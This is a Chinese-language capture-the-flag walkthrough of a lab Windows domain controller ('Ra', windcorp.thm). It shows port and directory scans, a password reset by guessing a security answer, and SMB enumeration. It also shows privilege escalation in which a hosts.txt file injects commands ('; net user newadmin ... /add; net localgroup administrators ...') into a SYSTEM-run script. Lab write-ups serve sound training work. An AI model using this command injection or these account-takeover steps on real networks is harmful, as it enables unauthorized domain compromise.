Ra
端口扫描
root@ip-10-10-255-92:~/ra# nmap -sTCV -p- --min-rate 1000 10.10.162.211
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-21 04:54 BST
Nmap scan report for ip-10-10-162-211.eu-west-1.compute.internal (10.10.162.211)
Host is up (0.00068s latency).
Not shown: 65498 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-21 03:56:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
| http-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
|_ Product_Version: 10.0.17763
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Not valid before: 2020-04-30T14:41:03
|_Not valid after: 2020-06-30T14:41:02
|_ssl-date: 2023-10-21T03:57:40+00:00; +1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2023-10-20T03:42:12
|_Not valid after: 2024-04-20T03:42:12
|_ssl-date: 2023-10-21T03:57:38+00:00; 0s from scanner time.
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| capabilities:
|
| auth_mechanisms:
|
| stream_id: 208i7l7v21
| xmpp:
| version: 1.0
| unknown:
|
| compression_methods:
|
| features:
|
| errors:
| invalid-namespace
|_ (timeout)
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| capabilities:
|
| auth_mechanisms:
|
| xmpp:
|
| unknown:
|
| compression_methods:
|
| features:
|
| errors:
|_ (timeout)
5229/tcp open jaxflow?
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| capabilities:
|
| auth_mechanisms:
|
| stream_id: 8frfogbn8p
| xmpp:
| version: 1.0
| unknown:
|
| compression_methods:
|
| features:
|
| errors:
| invalid-namespace
|_ (timeout)
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| capabilities:
|
| auth_mechanisms:
|
| xmpp:
|
| unknown:
|
| compression_methods:
|
| features:
|
| errors:
|_ (timeout)
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| STARTTLS Failed
| info:
| capabilities:
|
| auth_mechanisms:
|
| stream_id: 5evvzw525s
| xmpp:
| version: 1.0
| unknown:
|
| compression_methods:
|
| features:
|
| errors:
| host-unknown
|_ (timeout)
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| capabilities:
|
| auth_mechanisms:
|
| stream_id: 8axqty9mug
| xmpp:
| version: 1.0
| unknown:
|
| compression_methods:
|
| features:
|
| errors:
| invalid-namespace
|_ (timeout)
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| capabilities:
|
| auth_mechanisms:
|
| xmpp:
|
| unknown:
|
| compression_methods:
|
| features:
|
| errors:
|_ (timeout)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open http Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open ssl/http Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Sat, 21 Oct 2023 03:56:44 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 21 Oct 2023 03:56:49 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequest, DNSVersionBindReq:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Sat, 21 Oct 2023 03:57:00 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 21 Oct 2023 03:57:00 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 400 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49908/tcp open msrpc Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
从上面我们可以收集到一些内容:
- fire.windcorp.thm 、windcorp.thm 添加 hosts 文件
80
root@ip-10-10-255-92:~/ra# gobuster dir -u http://10.10.162.211/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.162.211/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html
[+] Timeout: 10s
===============================================================
2023/10/21 06:32:10 Starting gobuster
===============================================================
/index.html (Status: 200)
/img (Status: 301)
/css (Status: 301)
/Index.html (Status: 200)
/vendor (Status: 301)
/IMG (Status: 301)
/INDEX.html (Status: 200)
/CSS (Status: 301)
/Img (Status: 301)
===============================================================
2023/10/21 06:33:16 Finished
===============================================================
扫描目录之后并没发现发现什么内容, 之后访��问我们的访问从中我们可以收集到一些用户:
之后查看网页源代码我收集了一些用户名
organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
goldencat416
whiteleopard529
happymeercat399
orangegorilla428
lilyle
Emilieje
kirkug
# 对于照片用户, 用户名称应该就是他们的照片名称
Emilieje
lilyleAndSparky
kirkug.jpg
之后使用 kerberos 来验证我们的用户, 验证自己收集的用户名列表(详细内容查看 88 端口的攻击)
之后我从�网站上方看到其存在一个重置密码的功能, 之后我进行访问发现其是传统的密保询问修改密码其支持的类型为:
- 你母亲的姓
- 你一年老师的名称
- 你最喜欢的宠物名称
- 你的第一辆车品牌
回顾之前发现的用户, 我想到在焦点员工处有一个用户图像中有包含一条狗的图像, 之后查看图像的评论也可以确定这只狗就是其最喜欢的宠物名称此时观察图片的名称会发现其是 lilyleAndSparky 说明这是用户名称AND宠物名称, 之后我使用此重置了用户的密码
139/445
之后我使用收集到的密码访问了 SMB 服务发现存在一些共享
root@ip-10-10-255-92:~/ra# smbmap.py -H 10.10.162.211 -u lilyle -p ChangeMe#1234
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[+] IP: 10.10.162.211:445 Name: fire.windcorp.thm Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
访问新发现的共享我发现这里提供了一个新的程序 spark 并且告诉了我们版本信息, 基于此我开始了搜索发现其存在一个漏洞 CVE-2020-12772
root@ip-10-10-255-92:~/ra# smbclient \\\\10.10.162.211\\Shared -U lilyle%ChangeMe#1234
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 30 01:45:42 2020
.. D 0 Sat May 30 01:45:42 2020
Flag 1.txt A 45 Fri May 1 16:32:36 2020
spark_2_8_3.deb A 29526628 Sat May 30 01:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 12:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 12:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 12:07:24 2020
15587583 blocks of size 4096. 10885413 blocks available
root@ip-10-10-255-92:~/ra# smbclient \\\\10.10.162.211\\Users -U lilyle%ChangeMe#1234: Windows 下的 Users 目录
5222
如果不能连接, 请点击配置选择 “接受所有证书” 选项
之后我们只需要按照上面的 exp 进行攻击就可以获取到一个用户的 NTLM Hash 值了, 这里因为我的环境没有配置好的原因, 所以就不做编写了
后渗透
buse
buse —> Administrator
之后发现用户 buse 属于一个特殊的用户组 Account Operators 我们可以借助此来实现提权 Account Operators Privilege Escalation | White Oak Security
通过阅读上面的文章我们可以找到一些针对 Account Operators 的攻击方法, 但是遗憾我们除了修改用户密码之后没有其他�方法了. 之后在进行浏览时我在 C 盘发现了一个新的文件夹, 其中存在一个脚本通过阅读其内容我发现其是读取 C:\Users\brittanycr\hosts.txt 文件内容, 之后再进行一些操作, 所以我们可以可以构建如下攻击思路:
- 通过特殊用户组修改
brittanycr用户的密码 - 登陆 SMB 的共享访问
brittanycr的家目录, 修改 hosts 文件
*Evil-WinRM* PS C:\scripts> dir
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 10/26/2023 6:42 AM 31 log.txt
*Evil-WinRM* PS C:\scripts> icacls checkservers.ps1
checkservers.ps1 NT AUTHORITY\SYSTEM:(I)(F)
WINDCORP\IT:(I)(R)
BUILTIN\Administrators:(I)(F)
实现我们的攻击:
-
修改用户的密码
*Evil-WinRM* PS C:\scripts> net user brittanycr FUCyou123 /domain
The command completed successfully. -
通过 SMB 访问我们的
brittanycr用户家目录并创建对应的 hosts 文件, 进行覆盖操作root@ip-10-10-247-102:~/ra# cat << EOF > hosts.txt
> ; net user newadmin FUCKyou123 /add;net localgroup administrators newadmin /add
> EOF
root@ip-10-10-247-102:~/ra# smbclient \\\\10.10.93.170\\Shared -U brittanycr%FUCyou123
smb: \brittanycr\> ls
. D 0 Sun May 3 00:36:46 2020
.. D 0 Sun May 3 00:36:46 2020
hosts.txt A 22 Sun May 3 14:44:57 2020
15587583 blocks of size 4096. 10907975 blocks available
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (78.1 kb/s) (average 51.4 kb/s) -
使用 evil-winrm 进行连接登陆
扩展
88
可惜的是除此之外我们再无其他攻击路径
9090
但是很遗憾, 即使存在这个漏洞我们也无法使用其进行登陆的操作